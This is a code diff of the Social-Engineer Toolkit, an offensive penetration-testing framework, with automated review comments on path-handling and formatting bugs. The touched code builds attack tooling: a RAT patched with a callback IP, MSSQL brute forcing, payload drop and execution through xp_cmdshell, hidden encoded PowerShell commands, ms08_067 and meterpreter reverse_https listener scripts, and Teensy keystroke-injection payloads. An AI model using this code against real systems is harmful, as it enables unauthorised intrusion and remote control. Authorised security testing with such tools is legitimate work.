diff --git a/modules/ratte_only_module.py b/modules/ratte_only_module.py index 5c0a3f221..ddde53cb9 100755 --- a/modules/ratte_only_module.py +++ b/modules/ratte_only_module.py @@ -40,7 +40,7 @@ def prepare_ratte(ipaddr, ratteport, persistent, customexe): ############ # PATCH Server IP into RATTE ############ - with open(os.path.join(core.setdir, "ratteM.exe"), "wb") as filewrite: + with open(os.path.join(core.setdir + "ratteM.exe"), "wb") as filewrite: host = (len(ipaddr) + 1) * "X" r_port = (len(str(ratteport)) + 1) * "Y" @@ -126,7 +126,7 @@ def main(): ############ prepare_ratte(ipaddr, ratteport, persistent, customexe) - core.print_status("Payload has been exported to %s" % os.path.join(core.setdir, "ratteM.exe")) + core.print_status("Payload has been exported to %s" % os.path.join(core.setdir + "ratteM.exe")) ################### # start ratteserver diff --git a/readme/CHANGELOG b/readme/CHANGELOG index 120cad572..142ed749b 100644 --- a/readme/CHANGELOG +++ b/readme/CHANGELOG @@ -1,3 +1,12 @@ +~~~~~~~~~~~~~~~~ +version 7.3.4 +~~~~~~~~~~~~~~~~ + +* fixed an issue with mssql bruter that would cause it to fail over to nmap scans even if host wasn't valid +* fixed an issue that would cause UDP to not work properly when scanning subnet ranges +* improved handling and descriptions in mssql +* fixed error in mssql bruter + ~~~~~~~~~~~~~~~~ version 7.3.3 ~~~~~~~~~~~~~~~~ diff --git a/seproxy b/seproxy index 640ddea36..2217d5851 100755 --- a/seproxy +++ b/seproxy @@ -45,7 +45,7 @@ if operating_system == "posix": else: proxy_string = "export http_proxy='http://{0}'".format(proxy) - with open(os.path.join(core.setdir, "/proxy.config"), "w") as filewrite: + with open(os.path.join(core.setdir + "/proxy.config"), "w") as filewrite: filewrite.write(proxy_string) def kill_proc(port, flag): diff --git a/src/core/fasttrack.py b/src/core/fasttrack.py index 0dc3ce3b0..d03a20e9b 100644 --- a/src/core/fasttrack.py +++ b/src/core/fasttrack.py 
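Review bot: `os.path.join(core.setdir + "ratteM.exe")` in prepare_ratte passes a single argument, so the join call does nothing and the path is only correct while `core.setdir` ends in a separator. The same pattern is repeated in the second hunk of this file and throughout the commit (seproxy, mssql.py, psexec.py, sccm_main.py, the teensy modules, wifiattack.py). The old two-argument form was only wrong where the second component began with `/`, because an absolute component makes os.path.join discard `core.setdir`. Keeping `os.path.join(core.setdir, "ratteM.exe")` and removing the leading slash in the other calls, e.g. `os.path.join(core.setdir, "proxy.config")`, would keep these payload and config files inside the SET directory without relying on the trailing slash. prepare_ratte's body continues outside the hunk.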
@@ -97,11 +97,14 @@ try: iprange = iprange.split(",") for host in iprange: sqlport = get_sql_port(host) + if sqlport != None: print_status("Found SQL port on IP Address: %s and on port: %s" % (host, sqlport)) if sqlport == None: - sql_nmap_scan(host) - if sql_nmap_scan != None: + nmapscan = sql_nmap_scan(host) + if nmapscan != "": sql_servers = sql_servers + \ host + ":" + "1433" + "," + print_status("Found a SQL port on IP Address: %s and on port: 1433" % (host)) + if nmapscan == "": print_warning("Unable to find a SQL server on IP: %s" % (host)) if sqlport != None: sql_servers = sql_servers + \ host + ":" + sqlport + "," diff --git a/src/core/set.version b/src/core/set.version index 44e98ada9..c968a5762 100644 --- a/src/core/set.version +++ b/src/core/set.version @@ -1 +1 @@ -7.3.3 +7.3.4 diff --git a/src/core/setcore.py b/src/core/setcore.py index cea3d62a3..be1c0a750 100644 --- a/src/core/setcore.py +++ b/src/core/setcore.py @@ -1662,7 +1662,7 @@ def start_dns(): def setdir(): if check_os() == "posix": - return os.path.join(os.path.expanduser('~'), '.set') + return os.path.join(os.path.expanduser('~'), '.set' + '/') if check_os() == "windows": return "src/program_junk/" diff --git a/src/fasttrack/autopwn.py b/src/fasttrack/autopwn.py index 905482ba2..e20e24255 100644 --- a/src/fasttrack/autopwn.py +++ b/src/fasttrack/autopwn.py @@ -44,8 +44,8 @@ def launch(): core.print_status("Launching Metasploit and attacking the systems specified. This may take a moment..") # try/catch block try: - child = pexpect.spawn("{0} -r {1}\r\n\r\n".format(os.path.join(core.meta_path, 'msfconsole'), - os.path.join(core.setdir, "autopwn.answer"))) + child = pexpect.spawn("{0} -r {1}\r\n\r\n".format(os.path.join(core.meta_path + 'msfconsole'), + os.path.join(core.setdir + "autopwn.answer"))) child.interact() # handle exceptions and log them diff --git a/src/fasttrack/exploits/ms08067.py b/src/fasttrack/exploits/ms08067.py index 1a9bbb45c..8e8bd00b3 100644 
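Review bot: The new `if nmapscan != "":` branch records the host as a SQL server on port 1433 for any return value other than the empty string, so if `sql_nmap_scan` can return None (the removed code compared against None; the function itself is not shown here) a host with no SQL service is still added to `sql_servers`. Testing truthiness with an else branch covers both cases: `if nmapscan:` followed by `else: print_warning(...)`. The `sqlport != None` / `sqlport == None` comparisons in the same loop would read better as `is not None` / `is None`, and the two `sqlport != None` blocks could be merged. The enclosing try block starts and ends outside the hunk.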
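Review bot: setdir() now returns the posix path with a trailing `/`, and every caller changed in this commit depends on that by concatenating file names directly, but nothing in the function states it. A docstring such as `"""Return the SET working directory, always ending in a path separator."""` would make that contract visible. As far as the hunk shows, the function returns nothing when check_os() is neither "posix" nor "windows", in which case a concatenating caller would fail with a TypeError; the rest of the function is outside the hunk.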
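Review bot: `core.meta_path + 'msfconsole'` in launch() uses `meta_path` without calling it, while mssql.py, psexec.py and binary2teensy.py in this same commit call `core.meta_path()`. If `meta_path` is a function, as those call sites suggest, this concatenation raises a TypeError that the surrounding try block (its handler is outside the hunk) will only log. `os.path.join(core.meta_path(), 'msfconsole')` would match the other modules.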
--- a/src/fasttrack/exploits/ms08067.py +++ b/src/fasttrack/exploits/ms08067.py @@ -17,7 +17,7 @@ except NameError: def create_rc(revhost, victim, payload, port): - with open("/root/.set/ms08-067.rc", "w") as filewrite: + with open("/root/.set/ms08-067.rc" + "w") as filewrite: filewrite.write("use exploit/windows/smb/ms08_067_netapi\n" "set payload {0}\n" "set RHOST {1}\n" diff --git a/src/fasttrack/mssql.py b/src/fasttrack/mssql.py index b18e2e20e..c3b942583 100644 --- a/src/fasttrack/mssql.py +++ b/src/fasttrack/mssql.py @@ -96,6 +96,7 @@ def brute(ipaddr, username, port, wordlist): def deploy_hex2binary(ipaddr, port, username, password): # base variable used to select payload option option = None + choice1 = "1" conn = _mssql.connect("{0}:{1}".format(ipaddr, port), username, @@ -152,6 +153,7 @@ def deploy_hex2binary(ipaddr, port, username, password): choice1 = input("1.) Use Metasploit (default)\n" "2.) Select your own\n\n" "Enter your choice[1]:") + if choice1 == "": choice1 = "1" @@ -177,8 +179,8 @@ def deploy_hex2binary(ipaddr, port, username, password): # if we are using a SET interactive shell payload then we need to make # the path under web_clone versus ~./set - if os.path.isfile(os.path.join(core.setdir, "set.payload")): - web_path = os.path.join(core.setdir, "web_clone") + if os.path.isfile(os.path.join(core.setdir + "set.payload")): + web_path = os.path.join(core.setdir + "web_clone") # then we are using metasploit else: if operating_system == "posix": 
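Review bot: In create_rc the mode string has been concatenated onto the path, `open("/root/.set/ms08-067.rc" + "w")`, so the call opens `/root/.set/ms08-067.rcw` in the default read mode and the following `filewrite.write(...)` cannot succeed. The mode has to stay a separate argument: `with open("/root/.set/ms08-067.rc", "w") as filewrite:`. The path is also hard-coded to /root/.set rather than derived from the setdir() helper the other modules use, which is worth aligning if `core` is importable here. The function body continues outside the hunk.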
@@ -187,12 +189,12 @@ def deploy_hex2binary(ipaddr, port, username, password): if not os.path.isfile(core.setdir + "1msf.exe"): # move it then subprocess.Popen("cp %s/msf.exe %s/1msf.exe" % - (core.setdir, core.setdir), shell=True).wait() + (core.setdir + core.setdir), shell=True).wait() subprocess.Popen("cp %s/1msf.exe %s/ 1> /dev/null 2> /dev/null" % - (core.setdir, core.setdir), shell=True).wait() + (core.setdir + core.setdir), shell=True).wait() subprocess.Popen("cp %s/msf2.exe %s/msf.exe 1> /dev/null 2> /dev/null" % - (core.setdir, core.setdir), shell=True).wait() - payload_filename = os.path.join(web_path, "1msf.exe") + (core.setdir + core.setdir), shell=True).wait() + payload_filename = os.path.join(web_path + "1msf.exe") with open(payload_filename, "rb") as fileopen: # read in the binary @@ -201,12 +203,12 @@ def deploy_hex2binary(ipaddr, port, username, password): data = binascii.hexlify(data) # we write out binary out to a file - with open(os.path.join(core.setdir, "payload.hex"), "w") as filewrite: + with open(os.path.join(core.setdir + "payload.hex"), "w") as filewrite: filewrite.write(data) if choice1 == "1": # if we are using metasploit, start the listener - if not os.path.isfile(os.path.join(core.setdir, "set.payload")): + if not os.path.isfile(os.path.join(core.setdir + "set.payload")): if operating_system == "posix": try: core.module_reload(pexpect) @@ -214,8 +216,8 @@ def deploy_hex2binary(ipaddr, port, username, password): import pexpect core.print_status("Starting the Metasploit listener...") msf_path = core.meta_path() - child2 = pexpect.spawn("{0}-r {1}\r\n\r\n".format(os.path.join(core.meta_path(), "msfconsole"), - os.path.join(core.setdir, "meta_config"))) + child2 = pexpect.spawn("{0}-r {1}\r\n\r\n".format(os.path.join(core.meta_path() + "msfconsole"), + os.path.join(core.setdir + "meta_config"))) # random executable name random_exe = core.generate_random_string(10, 15) 
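Review bot: The three `cp` commands in deploy_hex2binary now format two `%s` placeholders with a single string, `% (core.setdir + core.setdir)`, which raises `TypeError: not enough arguments for format string` before anything is copied. The argument needs to be the tuple `(core.setdir, core.setdir)`. `os.path.join(web_path + "1msf.exe")` has a related problem: `web_path` is built without a trailing separator in the branch shown in the previous hunk, so it should be `os.path.join(web_path, "1msf.exe")`. Since these commands run with `shell=True` on an interpolated directory, `shutil.copyfile`, which this file already uses, would avoid the shell altogether.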
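Review bot: The listener command is built from `"{0}-r {1}\r\n\r\n"`, with no space between the msfconsole path and `-r`, so pexpect is asked to spawn a program whose name ends in `msfconsole-r`. The format string should read `"{0} -r {1}"`, as the second spawn call later in this function does. `msf_path` is assigned on the line above and could be used here instead of calling `core.meta_path()` again.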
@@ -239,7 +241,7 @@ def deploy_hex2binary(ipaddr, port, username, password): core.update_options("POWERSHELL_SOLO=ON") core.print_status("Prepping the payload for delivery and injecting alphanumeric shellcode...") - with open(os.path.join(core.setdir, "/payload_options.shellcode"), "w") as filewrite: + with open(os.path.join(core.setdir + "/payload_options.shellcode"), "w") as filewrite: # format needed for shellcode generation filewrite.write("windows/meterpreter/reverse_https {0},".format(port)) 
@@ -249,23 +251,23 @@ def deploy_hex2binary(ipaddr, port, username, password): import src.payloads.powershell.prep # create the directory if it does not exist - if not os.path.isdir(os.path.join(core.setdir, "reports/powershell")): - os.makedirs(os.path.join(core.setdir, "reports/powershell")) + if not os.path.isdir(os.path.join(core.setdir + "reports/powershell")): + os.makedirs(os.path.join(core.setdir + "reports/powershell")) - with open(os.path.join(core.setdir, "x86.powershell")) as x86: + with open(os.path.join(core.setdir + "x86.powershell")) as x86: x86 = x86.read() x86 = "powershell -nop -window hidden -noni -EncodedCommand {0}".format(x86) core.print_status("If you want the powershell commands and attack, " - "they are exported to {0}".format(os.path.join(core.setdir, "reports/powershell"))) - with open(os.path.join(core.setdir, "/reports/powershell/x86_powershell_injection.txt"), "w") as filewrite: + "they are exported to {0}".format(os.path.join(core.setdir + "reports/powershell"))) + with open(os.path.join(core.setdir + "/reports/powershell/x86_powershell_injection.txt"), "w") as filewrite: filewrite.write(x86) # if our payload is x86 based - need to prep msfconsole rc if payload == "x86": powershell_command = x86 # powershell_dir = core.setdir + "/reports/powershell/x86_powershell_injection.txt" - with open(os.path.join(core.setdir, "reports/powershell/powershell.rc"), "w") as filewrite: + with open(os.path.join(core.setdir + "reports/powershell/powershell.rc"), "w") as filewrite: filewrite.write("use multi/handler\n" "set payload windows/meterpreter/reverse_https\n" "set lport {0}\n" 
@@ -284,8 +286,8 @@ def deploy_hex2binary(ipaddr, port, username, password): import pexpect core.print_status("Starting the Metasploit listener...") - child2 = pexpect.spawn("{0} -r {1}".format(os.path.join(msf_path, "msfconsole"), - os.path.join(core.setdir, "reports/powershell/powershell.rc"))) + child2 = pexpect.spawn("{0} -r {1}".format(os.path.join(msf_path + "msfconsole"), + os.path.join(core.setdir + "reports/powershell/powershell.rc"))) core.print_status("Waiting for the listener to start first before we continue forward...") core.print_status("Be patient, Metaploit takes a little bit to start...") child2.expect("Starting the payload handler", timeout=30000) @@ -304,7 +306,7 @@ def deploy_hex2binary(ipaddr, port, username, password): # here we start the conversion and execute the payload core.print_status("Sending the main payload via to be converted back to a binary.") # read in the file 900 bytes at a time - with open(os.path.join(core.setdir, 'payload.hex')) as fileopen: + with open(os.path.join(core.setdir + 'payload.hex')) as fileopen: core.print_status("Dropping initial begin certificate header...") conn.execute_query("exec master ..xp_cmdshell 'echo -----BEGIN CERTIFICATE----- > {0}.crt'".format(random_exe)) for data in fileopen.read(900).rstrip(): @@ -325,10 +327,10 @@ def deploy_hex2binary(ipaddr, port, username, password): conn.execute_query("exec master..xp_cmdshell '{0}.exe'".format(random_exe)) # if we are using SET payload if choice1 == "1": - if os.path.isfile(os.path.join(core.setdir, "set.payload")): + if os.path.isfile(os.path.join(core.setdir + "set.payload")): core.print_status("Spawning separate child process for listener...") try: - shutil.copyfile(os.path.join(core.setdir, "web_clone/x"), definepath) + shutil.copyfile(os.path.join(core.setdir + "web_clone/x"), definepath) except: pass 
@@ -361,8 +363,8 @@ def deploy_hex2binary(ipaddr, port, username, password): if option == "2": core.print_status("Triggering payload stager...") alphainject = "" - if os.path.isfile(os.path.join(core.setdir, "meterpreter.alpha")): - with open(os.path.join(core.setdir, "meterpreter.alpha")) as fileopen: + if os.path.isfile(os.path.join(core.setdir + "meterpreter.alpha")): + with open(os.path.join(core.setdir + "meterpreter.alpha")) as fileopen: alphainject = fileopen.read() sql_command = ("xp_cmdshell '{0}.exe {1}'".format(random_exe, alphainject)) @@ -370,9 +372,9 @@ def deploy_hex2binary(ipaddr, port, username, password): thread.start_new_thread(conn.execute_query, (sql_command,)) time.sleep(1) - # if pexpect doesnt exit right then it freaks out + # if pexpect doesnt exit right then it freaks out if choice1 == "1": - if os.path.isfile(os.path.join(core.setdir, "set.payload")): + if os.path.isfile(os.path.join(core.setdir + "set.payload")): os.system("python ../../payloads/set_payloads/listener.py") try: # interact with the child process through pexpect diff --git a/src/fasttrack/psexec.py b/src/fasttrack/psexec.py index 08a6e7074..4b2271c3d 100644 --- a/src/fasttrack/psexec.py +++ b/src/fasttrack/psexec.py @@ -68,7 +68,7 @@ try: if port == "": port = "443" core.update_options("PORT={0}".format(port)) - with open(os.path.join(core.setdir, "/payload_options.shellcode"), "w") as filewrite: + with open(os.path.join(core.setdir + "/payload_options.shellcode"), "w") as filewrite: # format needed for shellcode generation filewrite.write("{0} {1},".format(payload, port)) core.update_options("POWERSHELL_SOLO=ON") 
@@ -80,14 +80,14 @@ try: import src.payloads.powershell.prep # create the directory if it does not exist - if not os.path.isdir(os.path.join(core.setdir, "reports/powershell")): - os.makedirs(os.path.join(core.setdir, "reports/powershell")) + if not os.path.isdir(os.path.join(core.setdir + "reports/powershell")): + os.makedirs(os.path.join(core.setdir + "reports/powershell")) - with open(os.path.join(core.setdir, "x86.powershell")) as fileopen: + with open(os.path.join(core.setdir + "x86.powershell")) as fileopen: x86 = fileopen.read() x86 = "powershell -nop -window hidden -noni -EncodedCommand {0}".format(x86) - core.print_status("If you want the powershell commands and attack, they are exported to {0}".format(os.path.join(core.setdir, "reports/powershell"))) - with open(os.path.join(core.setdir, "/reports/powershell/x86_powershell_injection.txt", "w")) as filewrite: + core.print_status("If you want the powershell commands and attack, they are exported to {0}".format(os.path.join(core.setdir + "reports/powershell"))) + with open(os.path.join(core.setdir + "/reports/powershell/x86_powershell_injection.txt", "w")) as filewrite: filewrite.write(x86) payload = "windows/meterpreter/reverse_https\n" # if we are using x86 command = x86 # assign powershell to command @@ -113,8 +113,8 @@ try: # launch metasploit below core.print_status("Launching Metasploit.. This may take a few seconds.") - subprocess.Popen("{0} -r {1}".format(os.path.join(core.meta_path(), "msfconsole"), - os.path.join(core.setdir, "reports/powershell/powershell.rc")), + subprocess.Popen("{0} -r {1}".format(os.path.join(core.meta_path() + "msfconsole"), + os.path.join(core.setdir + "reports/powershell/powershell.rc")), shell=True).wait() # handle exceptions diff --git a/src/fasttrack/sccm/sccm_main.py b/src/fasttrack/sccm/sccm_main.py index 8cc8eb0ea..0a7a32d0d 100644 --- a/src/fasttrack/sccm/sccm_main.py +++ b/src/fasttrack/sccm/sccm_main.py 
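Review bot: The `"w"` mode sits inside the os.path.join call rather than the open call in `open(os.path.join(core.setdir + "/reports/powershell/x86_powershell_injection.txt", "w"))`, so the path ends in `/w` and the file is opened for reading; the write of the PowerShell command cannot succeed. It should be `open(os.path.join(core.setdir, "reports/powershell/x86_powershell_injection.txt"), "w")`. The same misplaced parenthesis appears in binary2teensy.py (`answer.txt`) and in powershell_shellcode.py (`x86.powershell`, `/reports/teensy.pde`, `/metasploit.answers`). The enclosing try block starts and ends outside the hunk.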
@@ -48,7 +48,7 @@ Next '''.format(sms_server, package_id) # write out the file to reports -with open(os.path.join(core.setdir, "reports/sccm_configuration.txt"), 'w') as filewrite: +with open(os.path.join(core.setdir + "reports/sccm_configuration.txt"), 'w') as filewrite: filewrite.write(configuration) core.print_status("The SCCM configuration script has been successfully created.") core.print_status("You need to copy the script to the startup folder of the server.") diff --git a/src/teensy/binary2teensy.py b/src/teensy/binary2teensy.py index 290cb3772..d532c067b 100644 --- a/src/teensy/binary2teensy.py +++ b/src/teensy/binary2teensy.py @@ -246,7 +246,7 @@ except KeyboardInterrupt: print(" [*] Generating alpha_mixed shellcode to be injected after shellexec has been deployed on victim...") # grab msfvenom alphanumeric shellcode to be inserted into shellexec -proc = subprocess.Popen("{0} -p {1} EXITFUNC=thread LHOST={2} LPORT={3} {4} --format raw -e x86/alpha_mixed BufferRegister=EAX".format(os.path.join(core.meta_path(), "msfvenom"), +proc = subprocess.Popen("{0} -p {1} EXITFUNC=thread LHOST={2} LPORT={3} {4} --format raw -e x86/alpha_mixed BufferRegister=EAX".format(os.path.join(core.meta_path() + "msfvenom"), payload, ipaddr, port, 
@@ -440,15 +440,15 @@ Keyboard.send_now(); }}""".format(random_filename=random_filename, powershell_command=powershell_command, vbs=vbs, bat=bat, alpha_payload=alpha_payload)) # delete temporary file subprocess.Popen("rm {0} 1> /dev/null 2>/dev/null".format(random_filename), shell=True).wait() -print(" [*] Binary to Teensy file exported as {0}".format(os.path.join(core.setdir, "/reports/binary2teensy.pde"))) +print(" [*] Binary to Teensy file exported as {0}".format(os.path.join(core.setdir + "/reports/binary2teensy.pde"))) # write the teensy.pde file out -with open(os.path.join(core.setdir, "/reports/binary2teensy.pde"), 'w') as filewrite: +with open(os.path.join(core.setdir + "/reports/binary2teensy.pde"), 'w') as filewrite: # write the teensy.pde file out filewrite.write(output_variable) print(" [*] Generating a listener...") # create our metasploit answer file -with open(os.path.join(core.setdir, "answer.txt", "w")) as filewrite: +with open(os.path.join(core.setdir + "answer.txt", "w")) as filewrite: filewrite.write("use multi/handler\n" "set payload {0}\n" "set LHOST {1}\n" @@ -456,9 +456,9 @@ with open(os.path.join(core.setdir, "answer.txt", "w")) as filewrite: "{3}\n" "exploit -j".format(payload, ipaddr, port, url)) # spawn a multi/handler listener -subprocess.Popen("msfconsole -r {0}".format(os.path.join(core.setdir, "answer.txt")), shell=True).wait() +subprocess.Popen("msfconsole -r {0}".format(os.path.join(core.setdir + "answer.txt")), shell=True).wait() print(" [*] Housekeeping old files...") # if our answer file is still there (which it should be), then remove it -if os.path.isfile(os.path.join(core.setdir, "answer.txt")): +if os.path.isfile(os.path.join(core.setdir + "answer.txt")): # remove the old file, no longer used once we've exited - subprocess.Popen(os.path.join(core.setdir, "answer.txt"), shell=True).wait() + subprocess.Popen(os.path.join(core.setdir + "answer.txt"), shell=True).wait() 
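Review bot: The last line of this hunk passes the path of `answer.txt` to `subprocess.Popen(..., shell=True)`, which asks the shell to execute the file instead of deleting it as the comment above says, so the Metasploit answer file stays on disk. `os.remove(os.path.join(core.setdir, "answer.txt"))` does what the comment describes without a shell. The `msfconsole -r {0}` call above it also goes through `shell=True`; an argument list, `subprocess.Popen(["msfconsole", "-r", answer_path])`, would keep a directory name with spaces or shell metacharacters from being reinterpreted.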
diff --git a/src/teensy/powershell_shellcode.py b/src/teensy/powershell_shellcode.py index bab76f08b..5fa486308 100644 --- a/src/teensy/powershell_shellcode.py +++ b/src/teensy/powershell_shellcode.py @@ -24,18 +24,18 @@ This technique was introduced by Matthew Graeber (http://www.exploit-monday.com/ payload = "windows/meterpreter/reverse_tcp" # create base metasploit payload to pass to powershell.prep -with open(os.path.join(core.setdir, "metasploit.payload"), 'w') as filewrite: +with open(os.path.join(core.setdir + "metasploit.payload"), 'w') as filewrite: filewrite.write(payload) ipaddr = input("Enter the IP for the reverse: ") port = input("Enter the port for the reverse: ") shellcode = core.generate_powershell_alphanumeric_payload(payload, ipaddr, port, "") -with open(os.path.join(core.setdir, 'x86.powershell', 'w')) as filewrite: +with open(os.path.join(core.setdir + 'x86.powershell', 'w')) as filewrite: filewrite.write(shellcode) time.sleep(3) -with open(os.path.join(core.setdir, "x86.powershell")) as fileopen: +with open(os.path.join(core.setdir + "x86.powershell")) as fileopen: pass # read in x amount of bytes data_read = int(50) @@ -149,10 +149,10 @@ Keyboard.set_key1(0); Keyboard.send_now(); } """) -print("[*] Payload has been extracted. Copying file to {0}".format(os.path.join(core.setdir, "reports/teensy.pde"))) -if not os.path.isdir(os.path.join(core.setdir, "reports")): - os.makedirs(os.path.join(core.setdir, "reports")) -with open(os.path.join(core.setdir, "/reports/teensy.pde", "w")) as filewrite: +print("[*] Payload has been extracted. Copying file to {0}".format(os.path.join(core.setdir + "reports/teensy.pde"))) +if not os.path.isdir(os.path.join(core.setdir + "reports")): + os.makedirs(os.path.join(core.setdir + "reports")) +with open(os.path.join(core.setdir + "/reports/teensy.pde", "w")) as filewrite: filewrite.write(teensy) choice = core.yesno_prompt("0", "Do you want to start a listener [yes/no]: ") if choice == "YES": 
@@ -170,7 +170,7 @@ if choice == "YES": else: port = input("Enter the port to connect back on: ") - with open(os.path.join(core.setdir, "/metasploit.answers", "w")) as filewrite: + with open(os.path.join(core.setdir + "/metasploit.answers", "w")) as filewrite: filewrite.write("use multi/handler\n" "set payload {0}\n" "set LHOST {1}\n" @@ -180,8 +180,8 @@ if choice == "YES": print("[*] Launching Metasploit....") try: - child = pexpect.spawn("{0} -r {1}\r\n\r\n".format(os.path.join(core.meta_path(), "msfconsole"), - os.path.join(core.setdir, "metasploit.answers"))) + child = pexpect.spawn("{0} -r {1}\r\n\r\n".format(os.path.join(core.meta_path() + "msfconsole"), + os.path.join(core.setdir + "metasploit.answers"))) child.interact() except: pass diff --git a/src/teensy/teensy.py b/src/teensy/teensy.py index 43d010788..dcf70711e 100644 --- a/src/teensy/teensy.py +++ b/src/teensy/teensy.py @@ -30,8 +30,8 @@ if operating_system != "windows": import pexpect # check to see if setdir is created -if not os.path.isdir(os.path.join(core.setdir, "reports")): - os.makedirs(os.path.join(core.setdir, "reports")) +if not os.path.isdir(os.path.join(core.setdir + "reports")): + os.makedirs(os.path.join(core.setdir + "reports")) definepath = os.getcwd() # define if use apache or not @@ -57,7 +57,7 @@ for line in apache_check: # grab info from config file -with open(os.path.join(core.setdir, "teensy")) as fileopen: +with open(os.path.join(core.setdir + "teensy")) as fileopen: counter = 0 payload_counter = 0 choice = None 
@@ -77,14 +77,14 @@ with open(os.path.join(core.setdir, "teensy")) as fileopen: ipaddr = input(core.setprompt(["6"], "IP address to connect back on")) core.update_options("IPADDR=" + ipaddr) - if not os.path.isfile(os.path.join(core.setdir, "teensy")): + if not os.path.isfile(os.path.join(core.setdir + "teensy")): core.print_error("FATAL:Something went wrong, the Teensy config file was not created.") core.exit_set() def writefile(filename, now): - with open(os.path.join("src/teensy", filename)) as fileopen, \ - open(os.path.join(core.setdir, "/reports/teensy_{0}.pde".format(now)), "w") as filewrite: + with open(os.path.join("src/teensy" + filename)) as fileopen, \ + open(os.path.join(core.setdir + "/reports/teensy_{0}.pde".format(now)), "w") as filewrite: for line in fileopen: match = re.search("IPADDR", line) @@ -128,8 +128,8 @@ if choice == "13": # save our stuff here print(core.bcolors.BLUE + - "\n[*] PDE file created. You can get it under '{0}'".format(os.path.join(core.setdir, - "reports", + "\n[*] PDE file created. You can get it under '{0}'".format(os.path.join(core.setdir + + "reports" + "teensy_{0}.pde".format(now))) + core.bcolors.ENDC) print(core.bcolors.GREEN + 
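Review bot: `os.path.join("src/teensy" + filename)` in writefile joins the directory and the file name with no separator, so the template is looked up as `src/teensy<filename>` and the open fails. This needs the two-argument form, `os.path.join("src/teensy", filename)`. The next hunk has the same problem in the status message, where `core.setdir + "reports" + "teensy_{0}.pde"` prints a path that does not match the `/reports/teensy_{0}.pde` file writefile creates, and `webclone_path + "x.exe"` in the hunk after that drops the separator as well. writefile's body continues outside the hunk.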
@@ -142,29 +142,29 @@ print(core.bcolors.RED + pause = input("Press {return} to continue.") if payload_counter == 1: - webclone_path = os.path.join(core.setdir, "web_clone") - metasploit_exec_path = os.path.join(core.setdir, "msf.exe") + webclone_path = os.path.join(core.setdir + "web_clone") + metasploit_exec_path = os.path.join(core.setdir + "msf.exe") if not apache: subprocess.Popen("mkdir {0};" - "cp {1} {2} 1> /dev/null 2> /dev/null".format(webclone_path, - metasploit_exec_path, - os.path.join(webclone_path, "x.exe")), + "cp {1} {2} 1> /dev/null 2> /dev/null".format(webclone_path + + metasploit_exec_path + + os.path.join(webclone_path + "x.exe")), shell=True).wait() if operating_system != "windows": child = pexpect.spawn("python src/html/web_server.py") else: - subprocess.Popen("cp {0} {1}".format(metasploit_exec_path, os.path.join(webclone_path, "x.exe")), shell=True).wait() + subprocess.Popen("cp {0} {1}".format(metasploit_exec_path, os.path.join(webclone_path + "x.exe")), shell=True).wait() - if os.path.isfile(os.path.join(core.setdir, "meta_config")): + if os.path.isfile(os.path.join(core.setdir + "meta_config")): print(core.bcolors.BLUE + "\n[*] Launching MSF Listener...") print(core.bcolors.BLUE + "[*] This may take a few to load MSF..." + core.bcolors.ENDC) try: if operating_system != "windows": - child1 = pexpect.spawn("{0} -r {1}\r\n\r\n".format(os.path.join(msf_path, "msfconsole"), - os.path.join(core.setdir, "meta_config"))) + child1 = pexpect.spawn("{0} -r {1}\r\n\r\n".format(os.path.join(msf_path + "msfconsole"), + os.path.join(core.setdir + "meta_config"))) child1.interact() except: if operating_system != "windows": diff --git a/src/wireless/wifiattack.py b/src/wireless/wifiattack.py index 4cab12e93..910121495 100644 --- a/src/wireless/wifiattack.py +++ b/src/wireless/wifiattack.py 
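Review bot: The `mkdir`/`cp` command now calls `.format()` with one concatenated string, `webclone_path + metasploit_exec_path + os.path.join(...)`, while the template uses `{0}`, `{1}` and `{2}`, so it raises IndexError before the command runs. The arguments need to stay separate: `.format(webclone_path, metasploit_exec_path, os.path.join(webclone_path, "x.exe"))`. Creating the directory with `os.makedirs` and copying with `shutil.copyfile` would also remove the `shell=True` call on interpolated paths, if `shutil` is imported in this file.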
@@ -89,14 +89,14 @@ else: if fakeap_dhcp_menu_choice == "1": # writes the dhcp server out core.print_status("Writing the dhcp configuration file to ~/.set") - with open(os.path.join(core.setdir, "dhcp.conf"), "w") as filewrite: + with open(os.path.join(core.setdir + "dhcp.conf"), "w") as filewrite: filewrite.write(dhcp_config1) dhcptun = 1 if fakeap_dhcp_menu_choice == "2": # writes the dhcp server out core.print_status("Writing the dhcp configuration file to ~/.set") - with open(os.path.join(core.setdir, "dhcp.conf"), "w") as filewrite: + with open(os.path.join(core.setdir + "dhcp.conf"), "w") as filewrite: filewrite.write(dhcp_config2) dhcptun = 2